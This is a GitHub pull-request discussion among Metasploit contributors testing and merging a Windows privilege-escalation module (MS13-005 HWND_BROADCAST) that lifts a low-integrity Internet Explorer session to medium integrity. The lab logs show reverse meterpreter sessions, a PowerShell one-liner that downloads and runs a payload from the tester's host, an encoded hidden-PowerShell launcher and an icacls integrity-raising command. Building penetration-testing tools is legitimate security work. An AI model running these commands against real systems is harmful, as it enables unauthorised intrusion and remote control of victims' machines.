
Conversation

Meatballs1
Contributor

Tested on IE8-Win7 VM from: http://www.modern.ie/en-US/virtualization-tools#downloads

It's pretty fun to watch: http://www.youtube.com/watch?v=Vw8ylvTOlBQ

Also tested on Vista, but that doesn't support spawning a shell as there is no shortcut, so the only attack vector there is if the victim spawns a cmd prompt (or PowerShell) for you.

To test:

icacls meterp.exe /setintegritylevel low

ProcExp can tell you if a process is medium or low integrity for success.

Possible Improvements:
The low integrity check could possibly be refactored into Post::Accounts? But that's pending in another PR. It would also benefit from being railgunned.

Would the typing go faster if we did a multi railgun call?

Could add an option to just write the whole payload command rather than web download - but you'd definitely want to time this for the small hours of the morning. I expect that'd be better in a separate module? If we're getting in as a low integrity process we're probably exploiting IE anyway, so we have web access...

@jvazquez-r7
Contributor

Processing!

@jvazquez-r7
Contributor

First test has not been successful

[*] Current server process: iexplore.exe (2924)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 164
[+] Successfully migrated to process 

msf exploit(ms13_037_svg_dashstyle) > use exploit/windows/local/ms13_005_hwnd_broadcast 
msf exploit(ms13_005_hwnd_broadcast) > set session 1
session => 1
msf exploit(ms13_005_hwnd_broadcast) > show options

Module options (exploit/windows/local/ms13_005_hwnd_broadcast):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   SESSION       1                yes       The session to run this module on.
   SPAWN_PROMPT  true             yes       Attempts to spawn a medium integrity command prompt
   SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT       8080             yes       The local port to listen on.
   SSL           false            no        Negotiate SSL for incoming connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion    SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                        no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf exploit(ms13_005_hwnd_broadcast) > set SRVHOST 192.168.172.1
SRVHOST => 192.168.172.1
msf exploit(ms13_005_hwnd_broadcast) > set SRVPORT 8081
SRVPORT => 8081
msf exploit(ms13_005_hwnd_broadcast) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms13_005_hwnd_broadcast) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(ms13_005_hwnd_broadcast) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Using URL: http://192.168.172.1:8081/z63EC17E
[*] Server started.
msf exploit(ms13_005_hwnd_broadcast) > [*] Running module against WIN-RNJ7NBRK9L7
[-] Exploit failed [not-vulnerable]: Not running at Low Integrity!

The process is indeed low integrity:

[screenshot: li_process]

Was a "blind test", now digging into the code, etc, etc.


register_advanced_options(
[
OptBool.new('EEGG', [false, 'Anderson command technique',])
Contributor

Don't think it's needed for the exploit, is it?

@jvazquez-r7
Contributor

Screenshot of the exploit working! It is kinda cool :)

[screenshot: li_to_mi_ok]

Just need to work on the low_integrity check thing... digging

@Meatballs1
Contributor Author

The main issue with running this test is:
The spawned command prompt has to be visible on the taskbar to spawn a medium integrity command prompt. I attempt to grab the main window and make it visible so the prompt isn't hidden, etc.

You can disable SPAWN_PROMPT and create a cmd prompt yourself to see if the broadcast messages are being captured. If they aren't, your machine isn't vulnerable!

I guess I could do an MD5 check on the appropriate DLL or version and implement a check.

@jvazquez-r7
Contributor

And this is what happens when running the integrity check from an IE low integrity process (notice the Low subdir):

msf exploit(ms13_037_svg_dashstyle) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > cd %TEMP%
meterpreter > pwd
C:\Users\JUANVA~1\AppData\Local\Temp\Low
meterpreter > mkdir test
Creating directory: test

Indeed:

C:\Users\JUANVA~1\AppData\Local\Temp>icacls Low
Low NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
    BUILTIN\Administrators:(I)(OI)(CI)(F)
    WIN-RNJ7NBRK9L7\Juan Vazquez:(I)(OI)(CI)(F)
    Mandatory Label\Low Mandatory Level:(OI)(CI)(NW) <-- 

When the intended test is:

meterpreter > cd ..
meterpreter > pwd
C:\Users\JUANVA~1\AppData\Local\Temp
meterpreter > mkdir yup
Creating directory: yup
[-] stdapi_fs_mkdir: Operation failed: Access is denied.

So this test doesn't look useful for IE, working on it....

@Meatballs1
Contributor Author

Doh... We could just expandpath and look if the tempdir ends in Low. Hmmm, doesn't work.

@jvazquez-r7
Contributor

Hi @Meatballs1,

I've tried to address the thing on Meatballs1#6

Mainly:

  • Modifies the check for the integrity level, to allow false negatives when running in sessions from exploited LI IE processes. Basically it tries to write to the user path, and not to the TEMP path. Let me know if it makes sense to you.
  • On the other hand, since in sessions got from exploited IE sandboxed processes the %TEMP% folder points to a writable LI folder, I guess there will be similar situations. So I have added the option to drop the payload to the filesystem and execute it. Maybe it can be useful in some situations. Anyway, I like the idea of using PowerShell and HTTP, so by default I've kept your original exploit vector and just added the option for the user to drop it to FILESYSTEM. Let me know what you think :)

Test for the FILESYSTEM option:

msf exploit(ms13_037_svg_dashstyle) > [*] 192.168.0.3      ms13_037_svg_dashstyle - Requesting: /jKfqUIRkG5LFEtb
[*] 192.168.0.3      ms13_037_svg_dashstyle - Sending HTML to info leak...
[*] 192.168.0.3      ms13_037_svg_dashstyle - Requesting: /jKfqUIRkG5LFEtb/EdjExhKoxa?cQDDi=2009624752
[*] 192.168.0.3      ms13_037_svg_dashstyle - Using ntdll ROP
[*] 192.168.0.3      ms13_037_svg_dashstyle - Sending HTML to trigger...
[*] Sending stage (751104 bytes) to 192.168.0.3
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.3:49713) at 2013-07-26 14:50:57 -0500
[*] Session ID 1 (192.168.0.3:4444 -> 192.168.0.3:49713) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (880)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3920
[+] Successfully migrated to process 

msf exploit(ms13_037_svg_dashstyle) > use exploit/windows/local/ms13_005_hwnd_broadcast 
msf exploit(ms13_005_hwnd_broadcast) > set FILESYSTEM true
FILESYSTEM => true
msf exploit(ms13_005_hwnd_broadcast) > set SESSION 1
SESSION => 1
msf exploit(ms13_005_hwnd_broadcast) > rexploit
[*] Reloading module...

[-] Handler failed to bind to 192.168.0.3:4444
[*] Started reverse handler on 0.0.0.0:4444 
msf exploit(ms13_005_hwnd_broadcast) > [*] Running module against WIN-RNJ7NBRK9L7
[*] Trying to drop payload to C:\Users\JUANVA~1\AppData\Local\Temp\Low...
[+] Payload dropped successfully, exploiting...
[*] Spawning Low Integrity Cmd Prompt
[*] Bruteforcing Taskbar Position
[+] Spawned Medium Integrity Cmd Prompt
[*] Broadcasting payload command to prompt... I hope the user is asleep!
cd C:\Users\JUANVA~1\AppData\Local\Temp\Low && icacls EbjVUS.exe /setintegritylevel medium && EbjVUS.exe
[*] Executing command...
[*] Sending stage (751104 bytes) to 192.168.0.3
[*] Meterpreter session 2 opened (192.168.0.3:4444 -> 192.168.0.3:49728) at 2013-07-26 14:52:45 -0500
[*] Session ID 2 (192.168.0.3:4444 -> 192.168.0.3:49728) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: EbjVUS.exe (400)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1104
[+] Successfully migrated to process 

The new 1104 process is indeed MI:

[screenshot: mi_ok]

Feel free to review, test, discuss anything. Once it's handled I guess we'll be ready to land this one! :)

thanks!
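As an added example (not code from the pull request or the module), this Ruby reads the mandatory label from `icacls` output like the one quoted in the earlier comment and works out what a mkdir probe in that directory actually proves, which is why the check had to move from %TEMP% (the IE sandbox's Low-labelled subfolder) to the user path. The sample outputs are constructed and the host and user names in them are placeholders.

```ruby
# Windows integrity levels in ascending order.
INTEGRITY_LEVELS = {
  'Untrusted' => 0, 'Low' => 1, 'Medium' => 2, 'High' => 3, 'System' => 4
}.freeze

# Constructed sample modelled on the `icacls Low` output quoted in the thread
# (HOST\user is a placeholder, not a real account).
ICACLS_TEMP_LOW = <<~OUT
  Low NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(F)
      BUILTIN\\Administrators:(I)(OI)(CI)(F)
      HOST\\user:(I)(OI)(CI)(F)
      Mandatory Label\\Low Mandatory Level:(OI)(CI)(NW)
OUT

# Constructed sample of an ordinary profile directory: no explicit label line,
# which Windows treats as Medium with the default no-write-up policy.
ICACLS_PROFILE = <<~OUT
  C:\\Users\\user NT AUTHORITY\\SYSTEM:(OI)(CI)(F)
                BUILTIN\\Administrators:(OI)(CI)(F)
                HOST\\user:(OI)(CI)(F)
OUT

# Parse the "Mandatory Label\<Level> Mandatory Level:(...)" line; keep only the
# policy flags (NW = no write up, NR = no read up, NX = no execute up) and drop
# the inheritance flags (OI, CI).
def mandatory_label(icacls_output)
  m = icacls_output.match(/Mandatory Label\\(\w+) Mandatory Level:((?:\([A-Z]+\))+)/)
  return { level: 'Medium', policy: %w[NW] } unless m
  flags = m[2].scan(/\(([A-Z]+)\)/).flatten
  { level: m[1], policy: flags & %w[NW NR NX] }
end

# No-write-up rule: a process below the object's level cannot write when NW is set.
def write_blocked?(process_level, label)
  label[:policy].include?('NW') &&
    INTEGRITY_LEVELS.fetch(process_level) < INTEGRITY_LEVELS.fetch(label[:level])
end

# What a directory write test proves (assuming the DACL itself grants the user
# write access). Only a directory that refuses Low but admits Medium can tell a
# Low session from a Medium one; %TEMP%\Low in the IE sandbox admits both, so a
# successful mkdir there is the false negative seen in the thread.
def integrity_verdict(icacls_output, mkdir_succeeded)
  label = mandatory_label(icacls_output)
  decisive = write_blocked?('Low', label) && !write_blocked?('Medium', label)
  return :inconclusive unless decisive
  mkdir_succeeded ? :not_low : :low
end

if $PROGRAM_NAME == __FILE__
  puts "mkdir ok in %TEMP%\\Low  -> #{integrity_verdict(ICACLS_TEMP_LOW, true)}"
  puts "mkdir denied in profile -> #{integrity_verdict(ICACLS_PROFILE, false)}"
end
```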

@jvazquez-r7
Contributor

Thanks @Meatballs1 , landing!

@jvazquez-r7
Contributor

Not yet :P, giving time to @Meatballs1, work in progress on his side! :)

@Meatballs1
Contributor Author

I tried a multi railgun call but currently Meterpreter crashes. I can't find any examples anywhere at the moment of this in use. There's also a bug in that the multi handler doesn't handle 'CONSTANTS'.

I've added 3 technique options:
WEB/FILE you are familiar with.
TYPE - This types out the PowerShell command line as per psexec_psh or a custom command of the user's choosing. It is your fallback option when you can't egress and AV is picking up your files (although a .ps1 is less likely to get picked up).

Currently the PowerShell command line did not work in my environment - I need to check on this... [Edit] Just retried it and it worked fine...

Importing the Powershell library it is obvious that some of the datastore options are ambiguous (e.g. PERSIST), so I have added PSH:: in front in a similar fashion to EXE:: to give them some provenance.

@@ -8,9 +8,9 @@ def initialize(info = {})
super
register_options(
[
OptBool.new('PERSIST', [true, 'Run the payload in a loop', false]),
Contributor

Is anyone (module/mixin) using this option? Can you just rename it without other code modifications?

If it's the case I ask myself if this datastore option is really needed, just asking :)

(Same happens with PUSH_OLD_METHOD and RUN_WOW64).

On the other hand, if further code modifications are needed to change it, please don't change it in this pull request. Try not to modify mixins and/or libs when doing a pull request to add a module. It's easier to handle modules apart from mixins/libs/core changes.

Contributor Author

As far as I'm aware the only module using it at the moment is smb/psexec_psh:

grep "Exploit::Powershell" agrees!

Contributor

And the same mixin doesn't use the datastore options :?

Contributor

The Exploit::Powershell mixin I mean

Contributor Author

I'm not sure I understand the question?

Contributor

I'm sorry, trying to explain better. The Exploit::Powershell mixin is accessing datastore['PERSIST'], datastore['PSH_OLD_METHOD'] and datastore['RUN_WOW64']. My question is, are the old options names compatible with the new PSH::PERSIST, PSH::OLD_METHOD and PSH::RUN_WOW64? If not, I guess the code from the Exploit::Powershell mixin should be modified to use the new options names.

Contributor Author

Doh, yes I'm being daft

Contributor

Okay, I can land this change in this pull request. But please, in the future, when changing libs/core code use a different pull request than the one adding a module. It's a perfect example, where a core mixin is being modified, and this modification can be handled independently of the module addition. Just to take into account in the future, please :)

@sempervictus
Contributor

#2075 addresses the powershell stuff... we're currently running into the mismatch from using an old codebase for all of this. I keep running into this whenever I want to write something for framework trunk using PSH, since that PR contains a slew of methods for working with it.

@jvazquez-r7
Contributor

Processing, the TYPE attack vector is taking a really long time, more than I expected. Will update in a while, giving the chance....

@jvazquez-r7
Contributor

After all.... the TYPE method didn't work here:

msf exploit(ms13_005_hwnd_broadcast) > set session 1
session => 1
msf exploit(ms13_005_hwnd_broadcast) > rexploit
[*] Reloading module...

[-] Handler failed to bind to 10.6.0.165:4444
[*] Started reverse handler on 0.0.0.0:4444 
msf exploit(ms13_005_hwnd_broadcast) > [*] Running module against WIN-RNJ7NBRK9L7
[*] Spawning Low Integrity Cmd Prompt
[*] Bruteforcing Taskbar Position
[+] Spawned Medium Integrity Cmd Prompt
[*] Broadcasting payload command to prompt... I hope the user is asleep!
msf exploit(ms13_005_hwnd_broadcast) > jobs

Jobs
====

  Id  Name
  --  ----
  1   Exploit: windows/browser/ms13_037_svg_dashstyle
  2   Exploit: windows/local/ms13_005_hwnd_broadcast

msf exploit(ms13_005_hwnd_broadcast) > 

[*] Executing command...

On the CMD:

C:\Users\Juan Vazquez>%COMSPEC% /B /C start powershell.exe -Command "$si = New-Object System.Diagnostics.ProcessStartInfo;$si.FileName = \"powershell.exe\";$si.Arguments = ' -EncodedCommand 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 ';$si.UseShellExecute = $false;$si.RedirectStandardOutput = $true;$si.WindowStyle = 'Hidden';$si.CreateNoWindow = $True;$p = [System.Diagnostics.Process]::Start($si);"         

BTW: In case it could be related, it took a really long time to broadcast the full command!

OptBool.new('PERSIST', [true, 'Run the payload in a loop', false]),
OptBool.new('PSH_OLD_METHOD', [true, 'Use powershell 1.0', false]),
OptBool.new('RUN_WOW64', [
OptBool.new('PSH::PERSIST', [true, 'Run the payload in a loop', false]),
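Review bot: renaming the registered key from 'PERSIST' to 'PSH::PERSIST' (and, by the same hunk, 'PSH_OLD_METHOD' and 'RUN_WOW64') changes the datastore key, but the Exploit::Powershell mixin still reads datastore['PERSIST'], datastore['PSH_OLD_METHOD'] and datastore['RUN_WOW64'], so the mixin would be reading keys that are no longer registered; either update the mixin's lookups in the same change or, as suggested in the thread, keep the rename out of this pull request.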
Contributor

I've been reviewing other mixins using these types of names for datastore options. As far as I've checked there isn't a strict naming style for these types of options. I find:

  • UPPERCASE::CamelCase
  • UPPERCASE::snake_case

But never UPPERCASE::UPPERCASE. I'll be switching them to UPPERCASE::snake_case unless anyone stops me, since snake_case is preferred for naming variables in Ruby.

Contributor Author

It's probably best if I revert these changes from this module, and these comments should apply to #2075?

Contributor

Agree, it's probably better if you could revert these changes from this pull request. Indeed they aren't needed for the module to work.

@jvazquez-r7
Contributor

About the TYPE method, getting the command line, stopping the exploit, starting a handler and typing the command line on a Windows CMD manually, works:

msf exploit(ms13_005_hwnd_broadcast) > set LHOST 192.168.172.1
LHOST => 192.168.172.1
msf exploit(ms13_005_hwnd_broadcast) > rexploit
[*] Stopping existing job...
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
msf exploit(ms13_005_hwnd_broadcast) > [*] Running module against WIN-RNJ7NBRK9L7
[!] WARNING: It can take a LONG TIME to broadcast the cmd script to execute the psh payload
[*] %COMSPEC% /B /C start powershell.exe -Command "$si = New-Object System.Diagnostics.ProcessStartInfo;$si.FileName = \"powershell.exe\";$si.Arguments = ' -EncodedCommand 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 ';$si.UseShellExecute = $false;$si.RedirectStandardOutput = $true;$si.WindowStyle = 'Hidden';$si.CreateNoWindow = $True;$p = [System.Diagnostics.Process]::Start($si);"

Interrupt: use the 'exit' command to quit
msf exploit(ms13_005_hwnd_broadcast) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf exploit(ms13_005_hwnd_broadcast) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.172.1    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 192.168.172.172
[*] Meterpreter session 3 opened (192.168.172.1:4444 -> 192.168.172.172:49160) at 2013-07-29 09:55:43 -0500

meterpreter > 
meterpreter > background
[*] Backgrounding session 3...

So, maybe, the exploit handler / task is finishing before the payload "can be delivered" when using the TYPE technique. Is it working in your tests @Meatballs1?

Thanks!

juan

@Meatballs1
Contributor Author

Ah last thing I tried was windows/exec CMD=calc.exe as it would be quicker than Meterpreter. I guess this issue should be resolved the same route that is decided for #2156

@jvazquez-r7
Contributor

@Meatballs1 agree with your last comment, trying with windows/exec CMD=calc.exe

@Meatballs1
Contributor Author

Bah that reverted more than I wanted to! I've got myself into a gitloopofdoom(tm)

@Meatballs1
Contributor Author

Ok, cleaned out my PSH changes. Is there an executive design decision on how to handle 'indefinite' waits? I would like to see about speeding this up with railgun multicall but it seems completely non-functional at the moment. The alternative would be to hardcode a meterpreter method that takes a string and HWND_BROADCASTs it all for you :)

@jvazquez-r7
Contributor

Is there an executive design decision on how to handle 'indefinite' waits?

Not atm afaik.

I'm still trying the windows/exec payload .... taking the live again to deliver the CMD. I really don't think the TYPE option with a PowerShell encoded payload is very useful atm, but I still like the custom command option, so testing. If calc.exe spawns it's okay for me to land. I'll just add a warning message to show when people use the TYPE exploitation method. It takes a longer time than I thought indeed.

@jvazquez-r7
Contributor

Okay, finished and works; testing "old" methods, adding a warning message when using the TYPE technique with a payload, and proceeding with landing if all work as expected :)

@jvazquez-r7
Contributor

FILE Method tested successfully, now giving a chance to the WEB one:

msf exploit(ms13_005_hwnd_broadcast) > rexploit
[*] Stopping existing job...
[*] Reloading module...

[-] Handler failed to bind to 10.6.0.165:4444
[*] Started reverse handler on 0.0.0.0:4444 
msf exploit(ms13_005_hwnd_broadcast) > [*] Running module against WIN-RNJ7NBRK9L7
[*] Trying to drop payload to C:\Users\JUANVA~1\AppData\Local\Temp\Low...
[+] Payload dropped successfully, exploiting...
[*] Spawning Low Integrity Cmd Prompt
[*] Bruteforcing Taskbar Position
[+] Spawned Medium Integrity Cmd Prompt
[*] Broadcasting payload command to prompt... I hope the user is asleep!
cd C:\Users\JUANVA~1\AppData\Local\Temp\Low && icacls berXmO.exe /setintegritylevel medium && berXmO.exe
[*] Executing command...
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 2 opened (10.6.0.165:4444 -> 10.6.0.165:51228) at 2013-07-29 11:30:04 -0500
[*] Session ID 2 (10.6.0.165:4444 -> 10.6.0.165:51228) processing InitialAutoRunScript 'migrate -f'
[*] Waiting 0s before file cleanup...
[!] This exploit may require manual cleanup of: berXmO.exe
[*] Current server process: berXmO.exe (612)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1880
[+] Successfully migrated to process 

@jvazquez-r7
Contributor

Also the WEB one:

msf exploit(ms13_005_hwnd_broadcast) > set TECHNIQUE WEB
TECHNIQUE => WEB
msf exploit(ms13_005_hwnd_broadcast) > set SESSION 3
SESSION => 3
msf exploit(ms13_005_hwnd_broadcast) > rexploit
[*] Reloading module...

[-] Handler failed to bind to 10.6.0.165:4444
[*] Started reverse handler on 0.0.0.0:4444 
msf exploit(ms13_005_hwnd_broadcast) > [*] Running module against WIN-RNJ7NBRK9L7
[*] Using URL: http://0.0.0.0:8080/edMRTA
[*]  Local IP: http://10.6.0.165:8080/edMRTA
[*] Server started.
[*] Spawning Low Integrity Cmd Prompt
[*] Bruteforcing Taskbar Position
[+] Spawned Medium Integrity Cmd Prompt
[*] Broadcasting payload command to prompt... I hope the user is asleep!
powershell.exe -w hidden -nop -ep bypass -c IEX ((new-object net.webclient).downloadstring('http://10.6.0.165:8080/edMRTA'))
[*] Executing command...
[*] 10.6.0.165       ms13_005_hwnd_broadcast - Delivering Payload
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 4 opened (10.6.0.165:4444 -> 10.6.0.165:51276) at 2013-07-29 11:40:02 -0500
[*] Session ID 4 (10.6.0.165:4444 -> 10.6.0.165:51276) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: powershell.exe (2892)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 568
[+] Successfully migrated to process 

Thanks @Meatballs1 , landing!

jvazquez-r7 pushed a commit that referenced this pull request Jul 29, 2013
@jvazquez-r7 jvazquez-r7 merged commit 5c7f33a into rapid7:master Jul 29, 2013
@jvazquez-r7
Contributor

Landed, just small cleanup here: 3a05993

A warning message about long wait times for the user, and made it msftidy compliant. Thanks @Meatballs1 for an awesome exploit!

@Meatballs1
Contributor Author

For completeness the easter egg I wanted:

http://www.youtube.com/watch?v=yYmg7YX-YY0 :)

Cheers for putting up with all my dithering @jvazquez-r7
